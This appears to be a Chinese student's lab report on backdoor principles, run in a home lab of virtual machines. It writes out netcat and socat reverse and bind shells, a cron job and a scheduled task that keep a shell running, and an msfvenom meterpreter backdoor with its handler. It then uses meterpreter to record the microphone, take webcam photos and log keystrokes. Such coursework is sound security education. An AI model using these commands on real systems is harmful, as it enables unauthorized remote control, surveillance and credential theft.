zoukankan      html  css  js  c++  java
  • 2019-2020-2 20175228《网络对抗技术》exp2 后门原理与实践

    1.后门

    1.例举你能想到的一个后门进入到你系统中的可能方式?

    在下载非官网应用程序时,可能会捆绑后门程序。

    2.例举你知道的后门如何启动起来(win及linux)的方式?

    Win:设置开机自启动项,点击某个特定文件时启动;

    Linux:crontab -e 进行编辑,定时启动。

    3.Meterpreter有哪些给你映像深刻的功能?

    可以获取目标主机的shell,摄像头,音频记录(我说了什么干了什么都知道),击键记录(这个可以获取密码吧)。

    4.如何发现自己有系统有没有被安装后门?

    安装杀毒软件,定时对系统进行检测;查看任务管理器中有无异常进程。

    2.1 Windows获得Linux shell

    使用ipconfig查看本机IP

    使用nc.exe -l -p 5228打开监听

    在kali中使用ncat 192.168.62.132 5228 -e /bin/sh执行shell程序反弹连接Windows

    windows成功获得kali的shell

    2.2Linux获得Windows shell

    在kali中使用ifconfig查看ip

    使用nc -l -p5228打开kali的监听

    在Windows中使用nc.exe -e cmd.exe 192.168.62.128 5228反弹连接kali

    kali成功获得Windows的命令提示

    2.3 使用nc传输数据和文件

    Windows下使用nc.exe -l -p 5228监听5228端口

    kali下使用ncat 192.168.62.132 5228连接5228端口

    建立连接之后,传输数据

     Windows下使用nc.exe -l -p 5228 > file.out 监听5228端口,并把收到的数据保存到file.out中,kali使用ncat 192.168.62.132 5228 < file.txt反弹连接,建立成功后传输文件

    2.4启动cron

    Windows系统下监听端口5228,Linux系统下,输入指令crontab -e并选择3进入编辑模式,crontab指令表示增加一条定时任务,-e表示编辑
    在最后一行添加24 * * * */netcat 192.168.62.132 5228 -e /bin/sh,表示每个小时的第24分钟执行后面的那条指令。

    linux在24分钟时连接Windows,这是一个反弹连接式后门,监听的windows连接后可获得shell

    3.使用socat获取主机操作Shell, 任务计划启动

    在计算机管理中创建任务,新建操作,在操作中的程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5228 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5228,同时把cmd.exe的stderr重定向到stdout上;

    新建一个触发器;

    重新登陆时程序运行,此时在kali 输入指令socat - tcp:192.168.0.111:5228

    (由于我的win10虚拟机socat无法启动重新借了一个电脑,IP和前面的不同了)

    输入netstat:

    2.4使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

     在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.62.128 LPORT=5228 -f exe > 20175228_backdoor.exe。IP是kali的IP,生成了后门程序20175228_backdoor.exe

    通过ncat.exe -lv 5228 > 20175228_backdoor.exe指令将被控制主机进入接受文件模式

     

    在Linux中执行nc 192.168.0.111 5228 < 20175228_backdoor.exe

    Windows接收文件成功:

     

    在Kali上使用msfconsole指令进入msf控制台

    输入use exploit/multi/handler使用监听模块,设置payload

    set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload

    set LHOST 192.168.62.128,这里用的是LinuxIP,和生成后门程序时指定的IP相同

    set LPORT 5228,同样要使用相同的端口

    执行监听

    运行Windows下的后门程序

     

    此时kali获得了Windows主机的连接,并且得到了远程控制的shell

    这里由于我原来的虚拟机无法启动msf,所以换了台电脑重装了虚拟机重新进行实验,所以有些地方和前面的不一样了,比如原来是c盘,现在是d盘。

    2.5使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容

    使用record_mic -d 5指令可以截获一段时长5s的音频

    使用webcam_snap指令可以使用摄像头进行拍照(我关了摄像头)

    使用keyscan_start指令可以记录下击键的过程,keyscan_dump则用于读取击键记录(我用的ctrl+c)

    3 实验收获与感想

    Meterpreter的各种功能让我有些后怕,一旦我的电脑被植入了某个后门程序,那么我的声音,甚至是视频都会被非法分子获得,还有我的账号和密码,也相当于是给我敲响了警钟吧,以后一定会注意去官网下载软件,不下载网上那些莫名其妙的东西了。

  • 相关阅读:
    使pre的内容自动换行
    textarea文本换行和页面显示换行符
    SQL查询包含汉字的行
    网站引导页插件intro.js 的用法
    jquery.cookie中的操作
    sql自动生成汉语拼音和首字母函数
    IE,Chrome滚动条样式CSS
    Vcenter server 5.5上传ISO镜像
    Vcenter server 5.5添加用户角色及分配权限
    Vcenter server 5.5安装部署
  • 原文地址:https://www.cnblogs.com/20175228lyc/p/12501903.html
Copyright © 2011-2022 走看看